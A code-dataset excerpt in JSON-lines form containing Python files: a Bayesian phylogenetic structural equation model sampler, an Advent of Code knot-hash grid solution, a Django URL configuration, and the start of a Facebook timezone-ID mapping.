np\nfrom sem_model import SEMData, SEMModel\nfrom sem_opt_classic import SEMOptClassic\nfrom sem_opt_abc import SEMOptABC\nfrom ete3 import Tree\nfrom typing import List\nfrom sem_opt_bayes import SEMOptBayes\nfrom itertools import combinations_with_replacement, combinations\nfrom functools import reduce\nfrom scipy.stats import invwishart, invgamma, wishart, norm, uniform, multivariate_normal\nfrom functools import partial\n\n\nclass SEMModelNode(SEMModel):\n \"\"\" Class node contain also covariance matrix as parameters\"\"\"\n def __init__(self, file_model):\n \"\"\"\n\n :param file_model:\n \"\"\"\n\n super().__init__(file_model)\n\n # Save parameters\n self.n_param_mod = self.n_param\n # Add values in the covariance matrix as parameters\n self.matrices['Cov'] = self.set_cov()\n\n\n\n def set_cov(self):\n \"\"\"\n Set additional parameters of a covariance matrix\n :return:\n \"\"\"\n v_mpart = self.d_vars['MPart']\n n_mpart = len(v_mpart)\n for p in combinations_with_replacement(range(n_mpart), 2):\n self.add_parameter('Cov', p[0], p[1])\n\n m_cov = np.zeros((n_mpart, n_mpart))\n return m_cov\n\n\n def load_initial_dataset(self, data: SEMData):\n \"\"\"\n Load dataset: call super method and\n :param data:\n :return:\n \"\"\"\n super().load_initial_dataset(data)\n\n m_cov = data.m_cov\n for i, position in self.param_pos.items():\n mx_type, pos1, pos2 = position\n if mx_type is not 'Cov':\n continue\n self.param_val[i] = m_cov[pos1, pos2]\n\n\n def update_all(self, params=None):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n # Param-checker is within super-function\n super().update_all(params)\n\n if params is None:\n params = self.param_val\n\n for i, position in self.param_pos.items():\n mx_type, pos1, pos2 = position\n if mx_type is 'Cov':\n self.matrices[mx_type][pos1, pos2] = params[i]\n self.matrices[mx_type][pos2, pos1] = params[i]\n\n def get_cov_param(self, m_cov, id_mod):\n mx_type, pos1, pos2 = self.param_pos[id_mod]\n if mx_type != 'Cov':\n raise ValueError('This is not a cell within Cov Matrix')\n return m_cov[pos1, pos2]\n\nclass SEMTreeNode:\n def __init__(self, node_type):\n \"\"\"\n\n :param node_type:\n \"\"\"\n self.type = node_type\n self.dist = []\n\n def add_dist(self, name, dist):\n \"\"\"\n :param name:\n :param dist:\n :return:\n \"\"\"\n self.dist += [(name, dist)]\n\n\n\nclass SEMTree:\n\n def __init__(self, dataset: List[SEMData], file_name):\n \"\"\"\n This function creates the\n :param data:\n :param file_name:\n \"\"\"\n\n tree = Tree(file_name)\n\n self.nodes = dict()\n self.n_nodes = 0\n\n\n self.nodes['N0'] = SEMTreeNode('node')\n self.nodes['N0'].add_dist('N1', 20.8)\n self.nodes['N0'].add_dist('N3', 20.8)\n\n self.nodes['N1'] = SEMTreeNode('node')\n self.nodes['N1'].add_dist('N0', 20.8)\n self.nodes['N1'].add_dist('N2', 33.7)\n self.nodes['N1'].add_dist('NKL', 112.3)\n self.nodes['N1'].add_dist('B19', 112.3)\n\n self.nodes['NKL'] = SEMTreeNode('leaf')\n self.nodes['NKL'].add_dist('N1', 112.3)\n\n self.nodes['B19'] = SEMTreeNode('leaf')\n self.nodes['B19'].add_dist('N1', 112.3)\n\n self.nodes['N2'] = SEMTreeNode('node')\n self.nodes['N2'].add_dist('N1', 33.7)\n self.nodes['N2'].add_dist('CD4', 78.6)\n self.nodes['N2'].add_dist('CD8', 78.6)\n\n self.nodes['CD4'] = SEMTreeNode('leaf')\n self.nodes['CD4'].add_dist('N2', 78.6)\n\n self.nodes['CD8'] = SEMTreeNode('leaf')\n self.nodes['CD8'].add_dist('N2', 78.6)\n\n self.nodes['N3'] = SEMTreeNode('node')\n self.nodes['N3'].add_dist('N0', 20.8)\n self.nodes['N3'].add_dist('MON', 41.8)\n self.nodes['N3'].add_dist('NEU', 112.3)\n\n self.nodes['NEU'] = SEMTreeNode('leaf')\n self.nodes['NEU'].add_dist('N3', 112.3)\n\n self.nodes['MON'] = SEMTreeNode('leaf')\n self.nodes['MON'].add_dist('N3', 41.8)\n self.nodes['MON'].add_dist('DEN', 70.5)\n self.nodes['MON'].add_dist('MRF', 70.5)\n\n self.nodes['MRF'] = SEMTreeNode('leaf')\n self.nodes['MRF'].add_dist('MON', 70.5)\n\n self.nodes['DEN'] = SEMTreeNode('leaf')\n self.nodes['DEN'].add_dist('MON', 70.5)\n\n\n # self.get_nodes(tree)\n print(tree)\n\n # # Compare names of datasets and leaves of the tree\n # data_names = [data.name for data in dataset]\n # print(data_names)\n # for name in data_names:\n # if name not in self.nodes.keys():\n # raise ValueError('Dataset and Tree do not match')\n\n\n\n def get_nodes(self, tree):\n \"\"\"\n Recursive function to get all nodes and distances between them\n :param tree:\n :return:\n \"\"\"\n if tree.name == '':\n tree.name = 'N' + str(self.n_nodes)\n self.n_nodes += 1\n self.nodes[tree.name] = SEMTreeNode('node')\n else:\n self.nodes[tree.name] = SEMTreeNode('leaf')\n\n if tree.up is not None:\n name_p = tree.up.name # parent\n name_c = tree.name # children\n dist = tree.dist\n\n self.nodes[name_p].add_dist(name_c, dist)\n self.nodes[name_c].add_dist(name_p, dist)\n\n for node in tree.children:\n self.get_nodes(node)\n return\n\n\nclass Parameter:\n def __init__(self, node_name=None, mx_type=None, id_opt=None, id_mod=None):\n\n self._node_name = ''\n self._mx_type = ''\n self._id_opt = -1\n self._id_mod = -1\n\n if node_name is not None:\n self.node_name = node_name\n\n if mx_type is not None:\n self.mx_type = mx_type\n\n if id_opt is not None:\n self.id_opt = id_opt\n\n if id_mod is not None:\n self.id_mod = id_mod\n\n\n @property\n def mx_type(self):\n return self._mx_type\n\n @mx_type.setter\n def mx_type(self, mx_type):\n self._mx_type = mx_type\n\n @property\n def node_name(self):\n return self._node_name\n\n @node_name.setter\n def node_name(self, node_name):\n self._node_name = node_name\n\n @property\n def id_opt(self):\n return self._id_opt\n\n @id_opt.setter\n def id_opt(self, id_opt):\n self._id_opt = id_opt\n\n @property\n def id_mod(self):\n return self._id_mod\n\n @id_mod.setter\n def id_mod(self, id_mod):\n self._id_mod = id_mod\n\n def set_param(self, node_name, mx_type, id_opt, id_mod):\n self.node_name = node_name\n self.mx_type = mx_type\n self.id_opt = id_opt\n self.id_mod = id_mod\n\n\nclass SEMOptPhylo:\n\n def __init__(self,\n mod_node: SEMModelNode,\n dataset: List[SEMData],\n tree: SEMTree,\n estimator='From_Root'):\n \"\"\"\n\n :param mod_leaf:\n :param mod_node:\n :param dataset:\n :param tree:\n \"\"\"\n # Save Tree nodes\n self.tree = tree.nodes\n\n # Function to pump parameters through matrices\n self.get_matrices = mod_node.get_matrices\n self.get_cov_param = mod_node.get_cov_param\n self.n_param_mod = mod_node.n_param\n\n # Required Data\n self.m_profiles = {data.name: data.m_profiles for data in dataset}\n self.m_cov = {data.name: data.m_cov for data in dataset} # Covariance matrix\n\n # Get prior distributions\n # For this purpose ML-Wishard optimisation must be performed\n self.param_leaf = dict()\n for data in dataset:\n estimator_classic = 'MLW'\n try:\n opt_classic = SEMOptClassic(mod_node, data,\n estimator_classic)\n opt_classic.optimize()\n except:\n raise ValueError('SEM models within leaves do not converge')\n self.param_leaf[data.name] = opt_classic.params\n\n\n # Create all of the params\n self.param_pos = []\n self.param_val = []\n self.n_params = 0\n self.get_params(tree, mod_node)\n\n\n # Get priors for Beta, Lambda, Psi and Theta matrices\n self.p_psi_df, self.p_psi_cov = self.prior_params_psi()\n self.p_beta_mean, self.p_beta_cov = self.prior_params_coefs('Beta')\n self.p_theta_alpha, self.p_theta_beta = self.prior_params_theta()\n self.p_lambda_mean, self.p_lambda_cov = self.prior_params_coefs('Lambda')\n self.p_tree_alpha, self.p_tree_beta = self.prior_params_tree()\n\n # Starting values of parameters\n self.set_params(mod_node, dataset)\n\n # Options for the optimisation\n self.param_chain = np.array([self.param_val])\n self.loss_func = self.get_loss_function(estimator)\n\n print(\"SEMOptPhylo is successfully created\")\n\n\n def loss_functions(self) -> dict:\n \"\"\"\n Create the dictionary of possible functions\n :return:\n \"\"\"\n tmp_dict = dict()\n tmp_dict['From_Root'] = (('Cov', self.log_post_cov, self.constraint_cov),\n ('Beta', self.log_post_beta, self.constraint_sigma),\n ('Lambda', self.log_post_lambda, self.constraint_sigma),\n ('Psi', self.log_post_psi, self.constraint_psi),\n ('Theta', self.log_post_theta, self.constraint_theta),\n ('Tree', self.log_post_tree, self.constraint_tree))\n\n tmp_dict['Likelihood'] = (self.log_likelihood, ('Psi',\n 'Beta',\n 'Theta',\n 'Lambda'))\n return tmp_dict\n\n def get_loss_function(self, name):\n loss_dict = self.loss_functions()\n if name in loss_dict.keys():\n return loss_dict[name]\n else:\n raise Exception(\"SEMOpt_phylo Backend doesn't support loss function {}.\".format(name))\n\n\n def optimise(self):\n\n params_init = np.array(self.param_val)\n params_opt = np.array(self.param_val)\n\n\n for n_iter in range(200):\n print(n_iter)\n\n for mx_type, log_prob, constraint_func in self.loss_func:\n\n if mx_type in {'Theta', 'Psi'}: # Common parameters for all nodes\n node_order = [list(self.tree.keys())[0]]\n elif mx_type == 'Tree':\n node_order = [mx_type]\n mx_type = ['Beta', 'Lambda', 'Cov']\n else:\n leaf_names = list(self.m_profiles.keys())\n all_names = list(self.tree.keys())\n node_names = list(set(all_names) - set(leaf_names))\n node_names.sort(reverse=True)\n node_order = leaf_names + node_names\n\n for node_name in node_order:\n # print(node_name, mx_type)\n params_opt = self.metropolis_hastings(node_name,\n mx_type,\n log_prob,\n constraint_func,\n params_opt)\n\n self.param_chain = np.append(self.param_chain, [params_opt], axis=0)\n\n self.param_val = params_opt\n\n prob_init = self.log_joint(params_init)\n prob_final = self.log_joint(params_opt)\n return prob_init, prob_final\n\n\n def metropolis_hastings(self, node_name, mx_type, log_prob, constraint_func, params_opt):\n params_new = np.array(params_opt)\n\n for pos in self.param_pos:\n if (pos.mx_type not in mx_type) or (pos.node_name not in node_name):\n continue\n # print(node_name, mx_type)\n # print(pos.id_opt)\n p = params_opt[pos.id_opt]\n\n # Try five times to get a parameter which satisfies the constraint\n for _ in range(5):\n p_new = norm.rvs(p, 0.05, 1)\n params_new[pos.id_opt] = p_new\n # Constraint\n if constraint_func(params_new, node_name) == 0:\n break\n # If the required value was not sampled - do not accept it\n if constraint_func(params_new, node_name) < 0:\n params_new[pos.id_opt] = p\n continue\n\n\n # Calculate the Metropolis-Hastings statistics\n mh_log_stat = np.exp(log_prob(params_new, node_name) -\n log_prob(params_opt, node_name))\n # print('1', log_prob(params_new, node_name), node_name)\n # print('2', log_prob(params_opt, node_name), node_name)\n # print(node_name, mx_type)\n\n if (mh_log_stat < uniform.rvs(0, 1, 1)) \\\n or (mh_log_stat == 1):\n # Reject new value\n params_new[pos.id_opt] = p\n else:\n print(node_name, pos.mx_type, mh_log_stat)\n # Accept new value\n params_opt[pos.id_opt] = params_new[pos.id_opt]\n\n return params_new\n\n\n def get_node_params(self, params_opt, node_name):\n params_mod = np.zeros(self.n_param_mod)\n for p in self.param_pos:\n if p.node_name not in node_name:\n continue\n params_mod[p.id_mod] = params_opt[p.id_opt]\n return params_mod\n\n\n def set_node_params(self, params_mod, params_opt, node_name):\n\n for p in self.param_pos:\n if p.node_name not in node_name:\n continue\n params_opt[p.id_opt] = params_mod[p.id_mod]\n\n\n def get_id_opt(self, node_name, id_mod):\n for pos in self.param_pos:\n if pos.node_name == node_name and pos.id_mod == id_mod:\n return pos.id_opt\n return None\n\n\n def log_joint(self, params) -> List:\n pass\n\n\n def log_likelihood(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_sigma = self.calculate_sigma(params_node)\n if node_name in self.m_cov.keys():\n m_cov = self.m_cov[node_name]\n else:\n m_cov = self.get_matrices(params_node, 'Cov')\n df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n w = wishart.logpdf(m_cov, df=df, scale=m_sigma/df)\n return w\n\n\n def log_edge(self, node_name1, node_name2, dist, params_opt):\n # Get positions of parameters which evolve among the phylotree\n pos_evolve = [p for p in self.param_pos if p.node_name == 'Tree']\n prob_edge = 0\n for pos in pos_evolve:\n\n\n if (node_name1 in self.m_cov.keys()) and (pos.mx_type == 'Cov'):\n x = self.get_cov_param(self.m_cov[node_name1], pos.id_mod)\n else:\n id_opt_node1 = self.get_id_opt(node_name1, pos.id_mod)\n if id_opt_node1 is None:\n raise ValueError('None index returned')\n x = params_opt[id_opt_node1]\n\n\n if (node_name2 in self.m_cov.keys()) and (pos.mx_type == 'Cov'):\n m = self.get_cov_param(self.m_cov[node_name2], pos.id_mod)\n else:\n id_opt_node2 = self.get_id_opt(node_name2, pos.id_mod)\n if id_opt_node2 is None:\n raise ValueError('None index returned')\n m = params_opt[id_opt_node2]\n\n s = params_opt[pos.id_opt]\n\n # print('edge_x', x, id_opt_node1, node_name1, pos.id_mod)\n\n prob_edge += norm.logpdf(x, m, s*dist)\n # print('prob_edge', prob_edge)\n if s < 0:\n self.param_val = params_opt\n raise ValueError('Negative Variance')\n return prob_edge\n\n\n def log_post_beta(self, params_opt, node_name):\n prob_beta = self.log_likelihood(params_opt, node_name) + \\\n self.log_prior_beta(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_beta += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_beta\n\n\n def log_post_lambda(self, params_opt, node_name):\n prob_lambda = self.log_likelihood(params_opt, node_name) + \\\n self.log_prior_lambda(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_lambda += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_lambda\n\n\n def log_post_theta(self, params_opt):\n prob_theta = self.log_prior_theta(params_opt)\n prob_theta += sum(map(lambda x: self.log_likelihood(params_opt, x),\n self.tree.keys()))\n return prob_theta\n\n\n def log_post_psi(self, params_opt, *args):\n prob_psi = self.log_prior_psi(params_opt)\n prob_psi += sum(map(lambda x: self.log_likelihood(params_opt, x),\n self.tree.keys()))\n return prob_psi\n\n\n def log_post_cov(self, params_opt, node_name):\n prob_cov = self.log_likelihood(params_opt, node_name)\n for node_name2, dist in self.tree[node_name].dist:\n prob_cov += self.log_edge(node_name, node_name2, dist, params_opt)\n return prob_cov\n\n\n def log_post_tree(self, params_opt, *args):\n prob_tree = self.log_prior_tree(params_opt)\n # print('prob_tree', prob_tree)\n for node_name, edges in self.tree.items():\n if len(edges.dist) == 2: # If root\n continue\n edge = edges.dist[0]\n node_name2, dist = edge\n # print(node_name, node_name2, dist)\n # print('prob_tree', prob_tree)\n prob_tree += self.log_edge(node_name, node_name2, dist, params_opt)\n # print('prob_tree', prob_tree)\n return prob_tree\n\n\n def get_params(self, tree: SEMTree, mod_node: SEMModelNode):\n\n # Common Theta and Psi matrices\n node_names = tree.nodes.keys()\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Psi', 'Theta'}:\n continue\n for name in node_names:\n # Add new params\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # Outside of the loop\n # Single parameter for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Lambtda and Beta matrices\n node_names = tree.nodes.keys()\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Lambda', 'Beta'}:\n continue\n for name in node_names:\n # Add new paraту\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # WITHIN the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Covariance Matrices with parameters\n node_names = [name for name, node in tree.nodes.items() if node.type == 'node']\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Cov'}:\n continue\n for name in node_names:\n # Add new params\n self.param_pos += [Parameter(node_name=name,\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # WITHIN the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n # Parameters of a tree-process - the same for each node\n # Cov, Beta and Lambda matrices\n for i, position in mod_node.param_pos.items():\n mx_type = position[0]\n if mx_type not in {'Lambda', 'Beta', 'Cov'}:\n continue\n\n # Add new param\n self.param_pos += [Parameter(node_name='Tree',\n mx_type=mx_type,\n id_opt=self.n_params,\n id_mod=i)]\n # Outside the loop\n # Separate parameters for all nodes\n # self.param_val += [mod_node.param_val[i]]\n self.n_params += 1\n\n self.param_val = np.zeros(self.n_params)\n\n\n def set_params(self, mod_node: SEMModelNode, dataset: List[SEMData]):\n \"\"\"\n\n :param mod_node:\n :param dataset:\n :return:\n \"\"\"\n # Beta and Lambda Parameters start from zero values\n\n data_id = 0\n mod_node.load_initial_dataset(dataset[data_id])\n\n for pos in self.param_pos:\n # Only Psi, Theta and Cov parameters\n\n if pos.node_name is 'Tree':\n self.param_val[pos.id_opt] = 1\n continue\n if pos.mx_type in {'Beta', 'Lambda'}:\n continue\n self.param_val[pos.id_opt] = mod_node.param_val[pos.id_mod]\n\n\n def log_prior_psi(self, params_opt, *args):\n \"\"\" Inverse Whishart distribution of r0 and rho0\"\"\"\n\n rand_node_name = list(self.tree.keys())[0]\n params_node = self.get_node_params(params_opt, rand_node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n prob_psi = invwishart.logpdf(ms_psi, self.p_psi_df, self.p_psi_cov)\n return prob_psi\n\n\n def log_prior_beta(self, params_opt, node_name):\n \"\"\" Normal \"\"\"\n params_node = self.get_node_params(params_opt, node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n prob_beta = 0\n for pos in self.param_pos:\n if pos.mx_type != 'Beta' or pos.node_name != node_name:\n continue\n prob_beta += norm.logpdf(params_opt[pos.id_opt],\n self.p_beta_mean,\n self.p_beta_cov * ms_psi[pos.id_mod,\n pos.id_mod])\n return prob_beta\n\n\n def log_prior_theta(self, params_opt):\n \"\"\" Inverse Gamma distribution of r0 and rho0\"\"\"\n # As this parameter is the same through all of the nodes,\n # let take theta from the Theta parameters from the random node\n rand_node_name = list(self.tree.keys())[0]\n params_theta = [params_opt[pos.id_opt] for pos in self.param_pos\n if pos.mx_type == 'Theta' and pos.node_name == rand_node_name]\n invgamma_theta = partial(invgamma.logpdf,\n a=self.p_theta_alpha,\n scale=self.p_theta_beta)\n prob_theta = reduce(lambda x, y: x+y,\n map(invgamma_theta, params_theta))\n return prob_theta\n\n\n def log_prior_tree(self, params_opt):\n params_tree = [params_opt[p.id_opt] for p in self.param_pos if p.node_name == 'Tree']\n invgamma_tree = partial(invgamma.logpdf,\n a=self.p_tree_alpha,\n scale=self.p_tree_beta)\n\n prob_tree = reduce(lambda x, y: x+y,\n map(invgamma_tree, params_tree))\n return prob_tree\n\n\n def log_prior_lambda(self, params_opt, node_name):\n \"\"\" Normal \"\"\"\n params_node = self.get_node_params(params_opt, node_name)\n ms_theta = self.get_matrices(params_node)\n prob_lambda = 0\n for pos in self.param_pos:\n if pos.mx_type != 'Lambda' or pos.node_name != node_name:\n continue\n prob_lambda += norm.logpdf(params_opt[pos.id_opt],\n self.p_lambda_mean,\n self.p_lambda_cov * ms_theta[pos.id_mod,\n pos.id_mod])\n return prob_lambda\n\n\n def prior_params_psi(self):\n \"\"\"\n\n :return:\n \"\"\"\n # for Psi matrix\n\n # Mean value of all Psi matrices\n m_psi = reduce(lambda x, y: x+y,\n [self.get_matrices(params, 'Psi')\n for _, params in self.param_leaf.items()])\n m_psi = m_psi / len(self.param_leaf)\n\n # Dimension of psi matrix\n psi_dim = m_psi.shape[0]\n # Total number of all samples is a degree of freedom\n p_psi_df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n p_psi_cov = m_psi * (p_psi_df - psi_dim - 1)\n return p_psi_df, p_psi_cov\n\n\n def prior_params_coefs(self, mx_type):\n \"\"\"\n Parameters of the prior distribution of params if Beta of Lambda\n :return: mean and variance of Parameters\n \"\"\"\n coef_init = []\n for pos in self.param_pos:\n for _, param in self.param_leaf.items():\n if pos.node_name != 'Tree' and pos.mx_type == mx_type:\n coef_init += [param[pos.id_mod]]\n\n if not coef_init:\n coef_init = 0\n coef_mean = np.mean(coef_init)\n coef_var = np.var(coef_init) + 1\n return coef_mean, coef_var\n\n\n def prior_params_theta(self):\n \"\"\"\n\n :return:\n \"\"\"\n\n theta_init = []\n for pos in self.param_pos:\n for _, param in self.param_leaf.items():\n if pos.node_name != 'Tree' and pos.mx_type == 'Theta':\n theta_init += [param[pos.id_mod]]\n\n if not theta_init:\n theta_init = 0\n\n # Total number of all samples is a degree of freedom\n df = sum([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n p_theta_beta = np.median(theta_init) * (p_theta_alpha - 1)\n return p_theta_alpha, p_theta_beta\n\n\n def prior_params_tree(self):\n \"\"\"\n Parameters of a prior distribution of phylogenetic Wiener process\n Parameter Sigma of a Wiener process is prior distributed by inv-gamma\n :return:\n \"\"\"\n id = {name:i for i, name in enumerate(list(self.tree.keys()))}\n n_nodes = len(id)\n dist_mx = np.zeros((n_nodes, n_nodes))\n\n for node1, edges in self.tree.items():\n for node2, dist in edges.dist:\n dist_mx[id[node1], id[node2]] = dist\n dist_mx[id[node2], id[node1]] = dist\n\n # while np.count_nonzero(dist_mx) < (n_nodes ** 2 - n_nodes):\n for _ in range(20):\n for i, j in combinations(range(n_nodes), 2):\n if dist_mx[i,j] > 0:\n continue\n row_i = dist_mx[i]\n row_j = dist_mx[j]\n value = (row_i + row_j) * (row_i > 0) * (row_j > 0)\n dist_mx[i, j] = dist_mx[j, i] = - max(np.unique(value))\n dist_mx = np.abs(dist_mx)\n\n evolve_rate = []\n for node1, node2 in combinations(self.m_cov.keys(), 2):\n mx_cov_dist = np.abs(self.m_cov[node1] - self.m_cov[node2])\n elements = mx_cov_dist[np.triu_indices(len(mx_cov_dist))]\n norm_elements = elements / dist_mx[id[node2], id[node1]]\n evolve_rate += list(norm_elements)\n\n\n\n df = np.mean([p.shape[0] for _, p in self.m_profiles.items()])\n p_theta_alpha = df/2\n # p_theta_alpha = 4\n p_theta_beta = np.percentile(evolve_rate, 75) * (p_theta_alpha - 1)\n # print(p_theta_alpha, p_theta_beta)\n return p_theta_alpha, p_theta_beta\n\n\n def constraint_theta(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n ms_theta = self.get_matrices(params_node, 'Theta')\n return sum(ms_theta.diagonal() >= 0) - ms_theta.shape[0]\n\n\n def constraint_psi(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n ms_psi = self.get_matrices(params_node, 'Psi')\n # return np.linalg.det(ms['Psi']) - 1e-6\n return sum(np.linalg.eig(ms_psi)[0] > 0) - ms_psi.shape[0]\n\n\n def constraint_sigma(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_sigma = self.calculate_sigma(params_node)\n # return np.linalg.det(m_sigma) - 1e-6\n return sum(np.linalg.eig(m_sigma)[0] > 0) - m_sigma.shape[0]\n\n\n def constraint_cov(self, params_opt, node_name):\n params_node = self.get_node_params(params_opt, node_name)\n m_cov = self.get_matrices(params_node, 'Cov')\n # return np.linalg.det(m_sigma) - 1e-6\n return sum(np.linalg.eig(m_cov)[0] > 0) - m_cov.shape[0]\n\n\n def constraint_tree(self, params_opt, node_name):\n params_tree = [params_opt[p.id_opt] > 0 for p in self.param_pos\n if p.node_name == node_name]\n return sum(params_tree) - len(params_tree)\n\n\n def calculate_sigma(self, params):\n \"\"\"\n Sigma matrix calculated from the model\n \"\"\"\n ms = self.get_matrices(params)\n m_beta = ms['Beta']\n m_lambda = ms['Lambda']\n m_psi = ms['Psi']\n m_theta = ms['Theta']\n\n m_c = np.linalg.pinv(np.identity(m_beta.shape[0]) - m_beta)\n return m_lambda @ m_c @ m_psi @ m_c.T @ m_lambda.T + m_theta\n\n\n\n","sub_path":"sem_opt_phylo.py","file_name":"sem_opt_phylo.py","file_ext":"py","file_size_in_byte":30173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"373803483","text":"from knothash import KnotHash\n\ndef floodFill(coordinate, groupNumber):\n global coordsToGroup\n global grid\n\n if coordinate not in coordsToGroup:\n x, y = coordinate\n if x >= 0 and x < len(grid) and y >= 0 and y < len(grid):\n cellState = grid[x][y]\n\n if cellState:\n coordsToGroup[coordinate] = groupNumber\n\n floodFill((x-1, y), groupNumber) # north\n floodFill((x+1, y), groupNumber) # south\n floodFill((x, y+1), groupNumber) # east\n floodFill((x, y-1), groupNumber) # west\n\ninputStr = \"\"\nwith open(\"input.txt\", \"r\") as inputFile:\n inputStr = inputFile.readline().strip()\n\ndimension = 128\nknothash = KnotHash()\ngrid = []\nusedSquares = 0\nfor row in range(dimension):\n currentKnotHashInput = inputStr + \"-\" + str(row)\n \n currentKnotHash = knothash.generateHash(currentKnotHashInput)\n decimalKnotHash = int(currentKnotHash, 16)\n rawBinaryKnotHash = bin(decimalKnotHash)\n binaryKnotHashNo0 = rawBinaryKnotHash[2:]\n binaryKnotHash = \"0\" * (dimension - len(binaryKnotHashNo0)) + binaryKnotHashNo0\n\n\n gridRow = []\n for digit in str(binaryKnotHash):\n gridRow.append(digit == \"1\")\n usedSquares += digit == \"1\" if 1 else 0\n\n grid.append(gridRow)\n\nprint(\"Number of used squares: {}\".format(usedSquares))\n\ncoordsToGroup = {}\ngroupNumber = 0\nfor rowIndex, row in enumerate(grid):\n for colIndex, col in enumerate(row):\n coordinate = (rowIndex, colIndex)\n\n if col and coordinate not in coordsToGroup:\n floodFill(coordinate, groupNumber)\n groupNumber += 1\n\nprint(\"Number of groups: {}\".format(groupNumber))","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133644718","text":"from django.conf.urls import url, include\nfrom .views import (login_view, signup_view, settings_view, logout_view)\n\n\nurlpatterns = [\n url(r'^$',login_view,name='login'),\n url(r'^logout$',logout_view,name='logout'),\n #url(r'^login$',login_view,name='login'),\n url(r'^signup$',signup_view,name='signup'),\n url(r'^settings$',settings_view,name='settings'),\n]\n\n#pip install bcrypt\n#pip install django[argon2]\n","sub_path":"src/webapp/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111088463","text":"'''\nMIT License\n\nCopyright (c) 2018, Selectom.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\n# Based on https://developers.facebook.com/docs/marketing-api/reference/ad-account/timezone-ids/v2.12\n\n# 1 -> TZ_AMERICA_LOS_ANGELES\nfacebookTimezoneIdToTimezoneCode = {\n 0: 'TZ_UNKNOWN',\n 1: 'TZ_AMERICA_LOS_ANGELES',\n 2: 'TZ_AMERICA_DENVER',\n 3: 'TZ_PACIFIC_HONOLULU',\n 4: 'TZ_AMERICA_ANCHORAGE',\n 5: 'TZ_AMERICA_PHOENIX',\n 6: 'TZ_AMERICA_CHICAGO',\n 7: 'TZ_AMERICA_NEW_YORK',\n 8: 'TZ_ASIA_DUBAI',\n 9: 'TZ_AMERICA_ARGENTINA_SAN_LUIS',\n 10: 'TZ_AMERICA_ARGENTINA_BUENOS_AIRES',\n 11: 'TZ_AMERICA_ARGENTINA_SALTA',\n 12: 'TZ_EUROPE_VIENNA',\n 13: 'TZ_AUSTRALIA_PERTH',\n 14: 'TZ_AUSTRALIA_BROKEN_HILL',\n 15: 'TZ_AUSTRALIA_SYDNEY',\n 16: 'TZ_EUROPE_SARAJEVO',\n 17: 'TZ_ASIA_DHAKA',\n 18: 'TZ_EUROPE_BRUSSELS',\n 19: 'TZ_EUROPE_SOFIA',\n 20: 'TZ_ASIA_BAHRAIN',\n 21: 'TZ_AMERICA_LA_PAZ',\n 22: 'TZ_AMERICA_NORONHA',\n 23: 'TZ_AMERICA_CAMPO_GRANDE',\n 24: 'TZ_AMERICA_BELEM',\n 25: 'TZ_AMERICA_SAO_PAULO',\n 26: 'TZ_AMERICA_NASSAU',\n 27: 'TZ_AMERICA_DAWSON',\n 28: 'TZ_AMERICA_VANCOUVER',\n 29: 'TZ_AMERICA_DAWSON_CREEK',\n 30: 'TZ_AMERICA_EDMONTON',\n 31: 'TZ_AMERICA_RAINY_RIVER',\n 32: 'TZ_AMERICA_REGINA',\n 33: 'TZ_AMERICA_ATIKOKAN',\n 34: 'TZ_AMERICA_IQALUIT',\n 35: 'TZ_AMERICA_TORONTO',\n 36: 'TZ_AMERICA_BLANC_SABLON',\n 37: 'TZ_AMERICA_HALIFAX',\n 38: 'TZ_AMERICA_ST_JOHNS',\n 39: 'TZ_EUROPE_ZURICH',\n 40: 'TZ_PACIFIC_EASTER',\n 41: 'TZ_AMERICA_SANTIAGO',\n 42: 